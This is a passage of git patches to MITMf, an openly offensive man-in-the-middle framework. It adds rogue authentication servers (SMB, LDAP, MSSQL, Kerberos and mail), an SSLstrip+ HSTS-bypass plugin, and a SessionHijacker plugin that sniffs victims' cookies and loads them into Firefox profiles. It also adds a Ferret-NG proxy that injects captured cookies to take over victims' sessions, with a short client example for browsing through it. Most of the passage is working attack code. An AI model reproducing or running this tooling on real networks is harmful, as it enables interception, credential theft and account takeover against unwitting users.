+ str(e)) LANFingerprinter().start(options) MDNSPoisoner().start(options, self.ourip) - KERBServer().start() NBTNSPoisoner().start(options, self.ourip) LLMNRPoisoner().start(options, self.ourip) if options.wpad: + from core.responder.wpad.WPADPoisoner import WPADPoisoner WPADPoisoner().start(options) + if self.config["Responder"]["MSSQL"].lower() == "on": + from core.responder.mssql.MSSQLServer import MSSQLServer + MSSQLServer().start(smbChal) + + if self.config["Responder"]["Kerberos"].lower() == "on": + from core.responder.kerberos.KERBServer import KERBServer + KERBServer().start() + + if self.config["Responder"]["FTP"].lower() == "on": + from core.responder.ftp.FTPServer import FTPServer + FTPServer().start() + + if self.config["Responder"]["POP"].lower() == "on": + from core.responder.pop3.POP3Server import POP3Server + POP3Server().start() + + if self.config["Responder"]["SMTP"].lower() == "on": + from core.responder.smtp.SMTPServer import SMTPServer + SMTPServer().start() + + if self.config["Responder"]["IMAP"].lower() == "on": + from core.responder.imap.IMAPServer import IMAPServer + IMAPServer().start() + + if self.config["Responder"]["LDAP"].lower() == "on": + from core.responder.ldap.LDAPServer import LDAPServer + LDAPServer().start(smbChal) + if options.analyze: self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned") diff --git a/plugins/SSLstrip+.py b/plugins/SSLstrip+.py new file mode 100644 index 0000000..3594c27 --- /dev/null +++ b/plugins/SSLstrip+.py @@ -0,0 +1,51 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. 
+# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import sys +import logging + +from plugins.plugin import Plugin +from core.utils import IpTables +from core.sslstrip.URLMonitor import URLMonitor +from core.dnschef.DNSchef import DNSChef + +class HSTSbypass(Plugin): + name = 'SSLstrip+' + optname = 'hsts' + desc = 'Enables SSLstrip+ for partial HSTS bypass' + version = "0.4" + tree_output = ["SSLstrip+ by Leonardo Nve running"] + has_opts = False + + def initialize(self, options): + self.options = options + self.manualiptables = options.manualiptables + + if not options.manualiptables: + if IpTables.getInstance().dns is False: + IpTables.getInstance().DNS(options.ip_address, self.config['MITMf']['DNS']['port']) + + URLMonitor.getInstance().setHstsBypass() + DNSChef.getInstance().setHstsBypass() + + def finish(self): + if not self.manualiptables: + if IpTables.getInstance().dns is True: + IpTables.getInstance().Flush() diff --git a/plugins/SessionHijacker.py b/plugins/SessionHijacker.py new file mode 100644 index 0000000..baf163a --- /dev/null +++ b/plugins/SessionHijacker.py @@ -0,0 +1,187 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +#Almost all of the Firefox related code was stolen from Firelamb https://github.com/sensepost/mana/tree/master/firelamb +import threading +import os +import sys +import time +import logging +import sqlite3 +import json +import socket + +from plugins.plugin import Plugin +from core.publicsuffix.publicsuffix import PublicSuffixList +from urlparse import urlparse + +mitmf_logger = logging.getLogger("mitmf") + +class SessionHijacker(Plugin): + name = "Session Hijacker" + optname = "hijack" + desc = "Performs session hijacking attacks against clients" + implements = ["cleanHeaders"] #["handleHeader"] + version = "0.1" + has_opts = True + + def initialize(self, options): + '''Called if plugin is enabled, passed the options namespace''' + self.options = options + self.psl = PublicSuffixList() + self.firefox = options.firefox + self.mallory = options.mallory + self.save_dir = "./logs" + self.seen_hosts = {} + self.sql_conns = {} + self.sessions = [] + self.html_header="

Cookies sniffed for the following domains\n
" + + #Recent versions of Firefox use "PRAGMA journal_mode=WAL" which requires + #SQLite version 3.7.0 or later. You won't be able to read the database files + #with SQLite version 3.6.23.1 or earlier. You'll get the "file is encrypted + #or is not a database" message. + + sqlv = sqlite3.sqlite_version.split('.') + if (sqlv[0] <3 or sqlv[1] < 7): + sys.exit("[-] sqlite3 version 3.7 or greater required") + + if not os.path.exists("./logs"): + os.makedirs("./logs") + + if self.mallory: + t = threading.Thread(name='mallory_server', target=self.mallory_server, args=()) + t.setDaemon(True) + t.start() + + def cleanHeaders(self, request): # Client => Server + headers = request.getAllHeaders().copy() + client_ip = request.getClientIP() + + if 'cookie' in headers: + + if self.firefox: + url = "http://" + headers['host'] + request.getPathFromUri() + for cookie in headers['cookie'].split(';'): + eq = cookie.find("=") + cname = str(cookie)[0:eq].strip() + cvalue = str(cookie)[eq+1:].strip() + self.firefoxdb(headers['host'], cname, cvalue, url, client_ip) + + mitmf_logger.info("%s << Inserted cookie into firefox db" % client_ip) + + if self.mallory: + if len(self.sessions) > 0: + temp = [] + for session in self.sessions: + temp.append(session[0]) + if headers['host'] not in temp: + self.sessions.append((headers['host'], headers['cookie'])) + mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie'])) + mitmf_logger.info("%s Sent cookie to browser extension" % client_ip) + else: + self.sessions.append((headers['host'], headers['cookie'])) + mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie'])) + mitmf_logger.info("%s Sent cookie to browser extension" % client_ip) + + #def handleHeader(self, request, key, value): # Server => Client + # if 'set-cookie' in request.client.headers: + # cookie = request.client.headers['set-cookie'] + # #host = request.client.headers['host'] #wtf???? 
+ # message = "%s Got server cookie: %s" % (request.client.getClientIP(), cookie) + # if self.urlMonitor.isClientLogging() is True: + # self.urlMonitor.writeClientLog(request.client, request.client.headers, message) + # else: + # mitmf_logger.info(message) + + def mallory_server(self): + host = '' + port = 20666 + server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + server.bind((host,port)) + server.listen(1) + while True: + client, addr = server.accept() + if addr[0] != "127.0.0.1": + client.send("Hacked By China!") + client.close() + continue + request = client.recv(8192) + request = request.split('\n') + path = request[0].split()[1] + client.send("HTTP/1.0 200 OK\r\n") + client.send("Content-Type: text/html\r\n\r\n") + if path == "/": + client.send(json.dumps(self.sessions)) + client.close() + + def firefoxdb(self, host, cookie_name, cookie_value, url, ip): + + session_dir=self.save_dir + "/" + ip + cookie_file=session_dir +'/cookies.sqlite' + cookie_file_exists = os.path.exists(cookie_file) + + if (ip not in (self.sql_conns and os.listdir("./logs"))): + + try: + if not os.path.exists(session_dir): + os.makedirs(session_dir) + + db = sqlite3.connect(cookie_file, isolation_level=None) + self.sql_conns[ip] = db.cursor() + + if not cookie_file_exists: + self.sql_conns[ip].execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path))") + self.sql_conns[ip].execute("CREATE INDEX moz_basedomain ON moz_cookies (baseDomain)") + except Exception, e: + print str(e) + + scheme = urlparse(url).scheme + scheme = (urlparse(url).scheme) + basedomain = self.psl.get_public_suffix(host) + address = urlparse(url).hostname + short_url = scheme + "://"+ address + + log = open(session_dir + '/visited.html','a') + if (ip not in self.seen_hosts): + self.seen_hosts[ip] = {} + log.write(self.html_header) + + if (address not in self.seen_hosts[ip]): + self.seen_hosts[ip][address] = 1 + log.write("\n
\n%s" %(short_url, address)) + + log.close() + + if address == basedomain: + address = "." + address + + expire_date = 2000000000 #Year2033 + now = int(time.time()) - 600 + self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain,cookie_name,cookie_value,address,'/',expire_date,now,now,0,0)) + + def add_options(self, options): + options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies') + options.add_argument('--mallory', dest='mallory', action='store_true', default=False, help='Send cookies to the Mallory cookie injector browser extension') + + def finish(self): + if self.firefox: + print "\n[*] To load a session run: 'firefox -profile logs//visited.html'" \ No newline at end of file diff --git a/plugins/Spoof.py b/plugins/Spoof.py index 148e84c..228d54f 100644 --- a/plugins/Spoof.py +++ b/plugins/Spoof.py @@ -18,8 +18,6 @@ # USA # -import logging - from sys import exit from core.utils import SystemConfig, IpTables from core.protocols.arp.ARPpoisoner import ARPpoisoner diff --git a/plugins/Upsidedownternet.py b/plugins/Upsidedownternet.py index f14778e..3693df6 100644 --- a/plugins/Upsidedownternet.py +++ b/plugins/Upsidedownternet.py @@ -23,6 +23,8 @@ from cStringIO import StringIO from plugins.plugin import Plugin from PIL import Image +mitmf_logger = logging.getLogger("mitmf") + class Upsidedownternet(Plugin): name = "Upsidedownternet" optname = "upsidedownternet" From d3e509d4cd33c4ee0dfe26040506c8d5a71ceea4 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Wed, 6 May 2015 23:07:59 +0200 Subject: [PATCH 11/20] Added error handling to DNS and SMB servers when port is in use Added check to see if a plugins options were called without loading the actual plugin --- config/mitmf.conf | 5 +++++ core/dnschef/DNSchef.py | 12 ++++++++---- core/protocols/smb/SMBServer_Responder.py | 9 +-------- core/protocols/smb/SMBserver.py | 11 ++++++++--- core/responder/imap/IMAPServer.py | 2 +- core/responder/ldap/LDAPServer.py | 2 +- core/responder/mssql/MSSQLServer.py | 4 ++-- mitmf.py | 16 +++++++++++++++- plugins/Responder.py | 2 +- plugins/SSLstrip+.py | 5 +++-- 10 files changed, 45 insertions(+), 23 deletions(-) diff --git a/config/mitmf.conf b/config/mitmf.conf index c76f951..8387fbb 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -23,6 +23,11 @@ rpcpass = abc123 [[SMB]] + + # + #Here you can configure MITMf's internal SMB server + # + #Set a custom challenge Challenge = 1122334455667788 diff --git a/core/dnschef/DNSchef.py b/core/dnschef/DNSchef.py index 34ea779..e1473a2 100755 --- a/core/dnschef/DNSchef.py +++ b/core/dnschef/DNSchef.py @@ -474,10 +474,14 @@ class DNSChef(ConfigWatcher): self.onConfigChange() self.startConfigWatch() - if self.config['MITMf']['DNS']['tcp'].lower() == 'on': - self.startTCP() - else: - self.startUDP() + try: + if self.config['MITMf']['DNS']['tcp'].lower() == 'on': + self.startTCP() + else: + self.startUDP() + except socket.error as e: + if "Address already in use" in e: + sys.exit("\n[-] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port'])) # Initialize and start the DNS Server def startUDP(self): diff --git a/core/protocols/smb/SMBServer_Responder.py b/core/protocols/smb/SMBServer_Responder.py index 1b25456..b94b9ad 100644 --- a/core/protocols/smb/SMBServer_Responder.py +++ 
b/core/protocols/smb/SMBServer_Responder.py @@ -1,6 +1,3 @@ -################################################################################## -#SMB stuff starts here -################################################################################## class ThreadingTCPServer(ThreadingMixIn, TCPServer): @@ -333,8 +330,4 @@ class SMB1LM(BaseRequestHandler): except Exception: self.request.close() - pass - -################################################################################## -#SMB Server stuff ends here -################################################################################## \ No newline at end of file + pass \ No newline at end of file diff --git a/core/protocols/smb/SMBserver.py b/core/protocols/smb/SMBserver.py index ded9958..2081804 100644 --- a/core/protocols/smb/SMBserver.py +++ b/core/protocols/smb/SMBserver.py @@ -1,6 +1,7 @@ import logging import sys import threading +from socket import error as socketerror from impacket import version, smbserver, LOG from core.configwatcher import ConfigWatcher @@ -22,9 +23,13 @@ class SMBserver(ConfigWatcher): impacket_ver = version.VER_MINOR def __init__(self, listenAddress = '0.0.0.0', listenPort=445, configFile=''): - - self.server = smbserver.SimpleSMBServer(listenAddress, listenPort, configFile) - self.server.setSMBChallenge(self.config["MITMf"]["SMB"]["Challenge"]) + + try: + self.server = smbserver.SimpleSMBServer(listenAddress, listenPort, configFile) + self.server.setSMBChallenge(self.config["MITMf"]["SMB"]["Challenge"]) + except socketerror as e: + if "Address already in use" in e: + sys.exit("\n[-] Unable to start SMB server on port 445: port already in use") def start(self): t = threading.Thread(name='SMBserver', target=self.server.start) diff --git a/core/responder/imap/IMAPServer.py b/core/responder/imap/IMAPServer.py index 67e6a55..6466b28 100644 --- a/core/responder/imap/IMAPServer.py +++ b/core/responder/imap/IMAPServer.py @@ -16,7 +16,7 @@ class IMAPServer(): t = threading.Thread(name="IMAPServer", target=server.serve_forever) t.setDaemon(True) t.start() - except Exception, e: + except Exception as e: mitmf_logger.error("[IMAPServer] Error starting on port {}: {}".format(143, e)) class ThreadingTCPServer(ThreadingMixIn, TCPServer): diff --git a/core/responder/ldap/LDAPServer.py b/core/responder/ldap/LDAPServer.py index 4629f71..5d5c91a 100644 --- a/core/responder/ldap/LDAPServer.py +++ b/core/responder/ldap/LDAPServer.py @@ -20,7 +20,7 @@ class LDAPServer(): t = threading.Thread(name="LDAPServer", target=server.serve_forever) t.setDaemon(True) t.start() - except Exception, e: + except Exception as e: mitmf_logger.error("[LDAPServer] Error starting on port {}: {}".format(389, e)) class ThreadingTCPServer(ThreadingMixIn, TCPServer): diff --git a/core/responder/mssql/MSSQLServer.py b/core/responder/mssql/MSSQLServer.py index 71d38a5..806df10 100644 --- a/core/responder/mssql/MSSQLServer.py +++ b/core/responder/mssql/MSSQLServer.py @@ -12,14 +12,14 @@ class MSSQLServer(): def start(self, chal): global Challenge; Challenge = chal - + try: mitmf_logger.debug("[MSSQLServer] online") server = ThreadingTCPServer(("0.0.0.0", 1433), MSSQL) t = threading.Thread(name="MSSQLServer", target=server.serve_forever) t.setDaemon(True) t.start() - except Exception, e: + except Exception as e: mitmf_logger.error("[MSSQLServer] Error starting on port {}: {}".format(1433, e)) class ThreadingTCPServer(ThreadingMixIn, TCPServer): diff --git a/mitmf.py b/mitmf.py index 5263505..df3ed01 100755 --- a/mitmf.py +++ b/mitmf.py @@ -69,6 
+69,9 @@ try: except Exception as e: print "[-] Failed to load plugin class {}: {}".format(p, e) + +arg_dict = dict() #dict containing a plugin's optname with it's relative options + #Give subgroup to each plugin with options try: for p in plugins: @@ -81,6 +84,9 @@ try: if p.has_opts: p.add_options(sgroup) + + arg_dict[p.optname] = vars(sgroup)['_group_actions'] + except NotImplementedError: sys.exit("[-] {} plugin claimed option support, but didn't have it.".format(p.name)) @@ -90,11 +96,19 @@ if len(sys.argv) is 1: args = parser.parse_args() +# Definitely a better way to do this, will need to clean this up in the future +# Checks to see if we called a plugin's options without first invoking the actual plugin +for plugin, options in arg_dict.iteritems(): + if vars(args)[plugin] is False: + for option in options: + if vars(args)[option.dest] is True: + sys.exit("[-] Called plugin options without invoking --{}".format(plugin)) + #first check to see if we supplied a valid interface myip = SystemConfig.getIP(args.interface) mymac = SystemConfig.getMAC(args.interface) -#Start logging +#Start logging log_level = logging.__dict__[args.log_level.upper()] logging.basicConfig(level=log_level, format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") diff --git a/plugins/Responder.py b/plugins/Responder.py index dbd7f69..620e2b6 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -48,7 +48,7 @@ class Responder(Plugin): try: config = self.config['Responder'] smbChal = self.config['MITMf']['SMB']['Challenge'] - except Exception, e: + except Exception as e: sys.exit('[-] Error parsing config for Responder: ' + str(e)) LANFingerprinter().start(options) diff --git a/plugins/SSLstrip+.py b/plugins/SSLstrip+.py index 3594c27..887a6f0 100644 --- a/plugins/SSLstrip+.py +++ b/plugins/SSLstrip+.py @@ -22,7 +22,7 @@ import sys import logging from plugins.plugin import Plugin -from core.utils import IpTables +from core.utils import IpTables, SystemConfig from core.sslstrip.URLMonitor import URLMonitor from core.dnschef.DNSchef import DNSChef @@ -37,10 +37,11 @@ class HSTSbypass(Plugin): def initialize(self, options): self.options = options self.manualiptables = options.manualiptables + ip_address = SystemConfig.getIP(options.interface) if not options.manualiptables: if IpTables.getInstance().dns is False: - IpTables.getInstance().DNS(options.ip_address, self.config['MITMf']['DNS']['port']) + IpTables.getInstance().DNS(ip_address, self.config['MITMf']['DNS']['port']) URLMonitor.getInstance().setHstsBypass() DNSChef.getInstance().setHstsBypass() From 79025dc77eb76e87854d114e86e9ce409b906a61 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Mon, 11 May 2015 03:13:45 +0200 Subject: [PATCH 12/20] Initial working PoC for the Ferret-NG plugin that will replace the SessionHijacker plugin: it will capture cookies and transparently feed them to the proxy it starts up on port 10010 (by default), this way we just have to connect to the proxy, browse to the same website as the victim and we will automatically hijack their session! \o/ The way MITMf hooks SSLstrip's functions has been modified to improve plugin code readability, additionally corrected some useless function hooks that were placed in early framework releases and never removed. Replace plugin has been given its own section in the config file. Currently the BeefAutorun and Javapwn plugins have to be cleaned up...
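(Illustrative note, not part of this patch: the proxy address, target URL, and client code below are examples only; 10010 is simply the default port mentioned above.) Riding a captured session boils down to sending plain HTTP through the Ferret-NG proxy, since the proxy swaps in the victim's captured Cookie header for any host it has already seen. A minimal Python 2 sketch:

    import urllib2

    # Assumes MITMf is running on the same machine and Ferret-NG was left on its default port 10010
    proxy  = urllib2.ProxyHandler({'http': 'http://127.0.0.1:10010'})
    opener = urllib2.build_opener(proxy)

    # example.com stands in for whatever site the victim is logged into;
    # the proxy is expected to attach the captured session cookie for that host
    print opener.open('http://example.com/').read()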
BrowserProfiler plugin's Pinlady code has been updated to the latest version (v0.9.0) and will now detect Flash player's version. Javapwn plugin will be renamed to BrowserPwn and will support Flash exploits too, as opposed to only Java exploits. Since we now have a built-in SMB server, removed options to specify a host in the SMBAuth plugin. Tweaked the output of some plugins --- config/mitmf.conf | 10 +- core/configwatcher.py | 3 +- core/ferretNG/ClientRequest.py | 168 + core/ferretNG/CookieCleaner.py | 105 + core/ferretNG/DnsCache.py | 49 + core/ferretNG/FerretProxy.py | 24 + core/ferretNG/SSLServerConnection.py | 110 + core/ferretNG/ServerConnection.py | 193 + core/ferretNG/ServerConnectionFactory.py | 48 + core/ferretNG/URLMonitor.py | 85 + core/{publicsuffix => ferretNG}/__init__.py | 0 core/publicsuffix/publicsuffix.py | 106 - core/publicsuffix/publicsuffix.txt | 4909 ------------------- core/sergioproxy/ProxyPlugins.py | 28 +- core/sslstrip/ClientRequest.py | 17 +- core/sslstrip/ServerConnection.py | 65 +- core/utils.py | 45 - mitmf.py | 10 +- plugins/AppCachePoison.py | 33 +- plugins/BeefAutorun.py | 4 +- plugins/BrowserProfiler.py | 40 +- plugins/CacheKill.py | 26 +- plugins/FerretNG.py | 60 + plugins/Inject.py | 59 +- plugins/JavaPwn.py | 2 +- plugins/JsKeylogger.py | 27 +- plugins/Replace.py | 67 +- plugins/Responder.py | 3 +- plugins/SMBAuth.py | 12 +- plugins/SessionHijacker.py | 187 - plugins/Spoof.py | 7 +- plugins/Upsidedownternet.py | 19 +- plugins/plugin.py | 47 +- 33 files changed, 1080 insertions(+), 5488 deletions(-) create mode 100644 core/ferretNG/ClientRequest.py create mode 100644 core/ferretNG/CookieCleaner.py create mode 100644 core/ferretNG/DnsCache.py create mode 100644 core/ferretNG/FerretProxy.py create mode 100644 core/ferretNG/SSLServerConnection.py create mode 100644 core/ferretNG/ServerConnection.py create mode 100644 core/ferretNG/ServerConnectionFactory.py create mode 100644 core/ferretNG/URLMonitor.py rename core/{publicsuffix => ferretNG}/__init__.py (100%) delete mode 100644 core/publicsuffix/publicsuffix.py delete mode 100644 core/publicsuffix/publicsuffix.txt create mode 100644 plugins/FerretNG.py delete mode 100644 plugins/SessionHijacker.py diff --git a/config/mitmf.conf b/config/mitmf.conf index 8387fbb..040eec3 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -94,6 +94,14 @@ subnet = 255.255.255.0 dns_server = 192.168.2.20 #optional +[Replace] + + [[Regex1]] + 'Google Search' = 'Google In My Pants' + + [[Regex2]] + "I'm Feeling Lucky" = "I'm Feeling Something In My Pants" + [Responder] #Set these values to On or Off, so you can control which rogue authentication server is turned on. @@ -223,7 +231,7 @@ skip_in_mass_poison=1 #you can add other scripts in additional sections like jQuery etc.
-[JavaPwn] +[BrowserPwn] # # All versions strings without a * are considered vulnerable if clients Java version is <= update version diff --git a/core/configwatcher.py b/core/configwatcher.py index 03f8e3c..2da6962 100644 --- a/core/configwatcher.py +++ b/core/configwatcher.py @@ -12,7 +12,6 @@ mitmf_logger = logging.getLogger('mitmf') class ConfigWatcher(FileSystemEventHandler): _instance = None - config = ConfigObj("./config/mitmf.conf") @staticmethod @@ -43,5 +42,5 @@ class ConfigWatcher(FileSystemEventHandler): try: self.config = ConfigObj("./config/mitmf.conf") except Exception as e: - mitmf_logger.warning("Error reloading config file: {}".format(e)) + mitmf_logger.error("Error reloading config file: {}".format(e)) pass diff --git a/core/ferretNG/ClientRequest.py b/core/ferretNG/ClientRequest.py new file mode 100644 index 0000000..ac6a80b --- /dev/null +++ b/core/ferretNG/ClientRequest.py @@ -0,0 +1,168 @@ +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import urlparse +import logging +import os +import sys +import random +import re + +from twisted.web.http import Request +from twisted.web.http import HTTPChannel +from twisted.web.http import HTTPClient + +from twisted.internet import ssl +from twisted.internet import defer +from twisted.internet import reactor +from twisted.internet.protocol import ClientFactory + +from ServerConnectionFactory import ServerConnectionFactory +from ServerConnection import ServerConnection +from SSLServerConnection import SSLServerConnection +from URLMonitor import URLMonitor +from CookieCleaner import CookieCleaner +from DnsCache import DnsCache + +mitmf_logger = logging.getLogger('mitmf') + +class ClientRequest(Request): + + ''' This class represents incoming client requests and is essentially where + the magic begins. Here we remove the client headers we dont like, and then + respond with either favicon spoofing, session denial, or proxy through HTTP + or SSL to the server. 
+ ''' + + def __init__(self, channel, queued, reactor=reactor): + Request.__init__(self, channel, queued) + self.reactor = reactor + self.urlMonitor = URLMonitor.getInstance() + self.cookieCleaner = CookieCleaner.getInstance() + self.dnsCache = DnsCache.getInstance() + #self.uniqueId = random.randint(0, 10000) + + def cleanHeaders(self): + headers = self.getAllHeaders().copy() + + if 'accept-encoding' in headers: + del headers['accept-encoding'] + mitmf_logger.debug("[Ferret-NG] [ClientRequest] Zapped encoding") + + if 'if-modified-since' in headers: + del headers['if-modified-since'] + + if 'cache-control' in headers: + del headers['cache-control'] + + if 'host' in headers: + if headers['host'] in self.urlMonitor.cookies: + mitmf_logger.info("[Ferret-NG] Hijacking session for host: {}".format(headers['host'])) + headers['cookie'] = self.urlMonitor.cookies[headers['host']] + + return headers + + def getPathFromUri(self): + if (self.uri.find("http://") == 0): + index = self.uri.find('/', 7) + return self.uri[index:] + + return self.uri + + def handleHostResolvedSuccess(self, address): + mitmf_logger.debug("[Ferret-NG] [ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address)) + host = self.getHeader("host") + headers = self.cleanHeaders() + client = self.getClientIP() + path = self.getPathFromUri() + url = 'http://' + host + path + self.uri = url # set URI to absolute + + if self.content: + self.content.seek(0,0) + + postData = self.content.read() + + hostparts = host.split(':') + self.dnsCache.cacheResolution(hostparts[0], address) + + if (not self.cookieCleaner.isClean(self.method, client, host, headers)): + mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending expired cookies") + self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path)) + + elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)): + if 'securelink' in headers: + del headers['securelink'] + + mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending request via SSL ({})".format((client,url))) + self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url)) + + else: + mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending request via HTTP") + #self.proxyViaHTTP(address, self.method, path, postData, headers) + port = 80 + if len(hostparts) > 1: + port = int(hostparts[1]) + + self.proxyViaHTTP(address, self.method, path, postData, headers, port) + + def handleHostResolvedError(self, error): + mitmf_logger.debug("[Ferret-NG] [ClientRequest] Host resolution error: {}".format(error)) + try: + self.finish() + except: + pass + + def resolveHost(self, host): + address = self.dnsCache.getCachedAddress(host) + + if address != None: + mitmf_logger.debug("[Ferret-NG] [ClientRequest] Host cached: {} {}".format(host, address)) + return defer.succeed(address) + else: + return reactor.resolve(host) + + def process(self): + mitmf_logger.debug("[Ferret-NG] [ClientRequest] Resolving host: {}".format(self.getHeader('host'))) + host = self.getHeader('host').split(":")[0] + + deferred = self.resolveHost(host) + deferred.addCallback(self.handleHostResolvedSuccess) + deferred.addErrback(self.handleHostResolvedError) + + def proxyViaHTTP(self, host, method, path, postData, headers, port): + connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) + connectionFactory.protocol = ServerConnection + #self.reactor.connectTCP(host, 80, connectionFactory) + 
self.reactor.connectTCP(host, port, connectionFactory) + + def proxyViaSSL(self, host, method, path, postData, headers, port): + clientContextFactory = ssl.ClientContextFactory() + connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) + connectionFactory.protocol = SSLServerConnection + self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory) + + def sendExpiredCookies(self, host, path, expireHeaders): + self.setResponseCode(302, "Moved") + self.setHeader("Connection", "close") + self.setHeader("Location", "http://" + host + path) + + for header in expireHeaders: + self.setHeader("Set-Cookie", header) + + self.finish() diff --git a/core/ferretNG/CookieCleaner.py b/core/ferretNG/CookieCleaner.py new file mode 100644 index 0000000..5ba393c --- /dev/null +++ b/core/ferretNG/CookieCleaner.py @@ -0,0 +1,105 @@ +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import logging +import string + +class CookieCleaner: + '''This class cleans cookies we haven't seen before. The basic idea is to + kill sessions, which isn't entirely straight-forward. Since we want this to + be generalized, there's no way for us to know exactly what cookie we're trying + to kill, which also means we don't know what domain or path it has been set for. + + The rule with cookies is that specific overrides general. So cookies that are + set for mail.foo.com override cookies with the same name that are set for .foo.com, + just as cookies that are set for foo.com/mail override cookies with the same name + that are set for foo.com/ + + The best we can do is guess, so we just try to cover our bases by expiring cookies + in a few different ways. The most obvious thing to do is look for individual cookies + and nail the ones we haven't seen coming from the server, but the problem is that cookies are often + set by Javascript instead of a Set-Cookie header, and if we block those the site + will think cookies are disabled in the browser. So we do the expirations and whitlisting + based on client,server tuples. The first time a client hits a server, we kill whatever + cookies we see then. After that, we just let them through. Not perfect, but pretty effective. 
+ + ''' + + _instance = None + + def __init__(self): + self.cleanedCookies = set(); + self.enabled = False + + @staticmethod + def getInstance(): + if CookieCleaner._instance == None: + CookieCleaner._instance = CookieCleaner() + + return CookieCleaner._instance + + def setEnabled(self, enabled): + self.enabled = enabled + + def isClean(self, method, client, host, headers): + if method == "POST": return True + if not self.enabled: return True + if not self.hasCookies(headers): return True + + return (client, self.getDomainFor(host)) in self.cleanedCookies + + def getExpireHeaders(self, method, client, host, headers, path): + domain = self.getDomainFor(host) + self.cleanedCookies.add((client, domain)) + + expireHeaders = [] + + for cookie in headers['cookie'].split(";"): + cookie = cookie.split("=")[0].strip() + expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path) + expireHeaders.extend(expireHeadersForCookie) + + return expireHeaders + + def hasCookies(self, headers): + return 'cookie' in headers + + def getDomainFor(self, host): + hostParts = host.split(".") + return "." + hostParts[-2] + "." + hostParts[-1] + + def getExpireCookieStringFor(self, cookie, host, domain, path): + pathList = path.split("/") + expireStrings = list() + + expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain + + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") + + expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host + + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") + + if len(pathList) > 2: + expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + + domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") + + expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + + host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") + + return expireStrings + + diff --git a/core/ferretNG/DnsCache.py b/core/ferretNG/DnsCache.py new file mode 100644 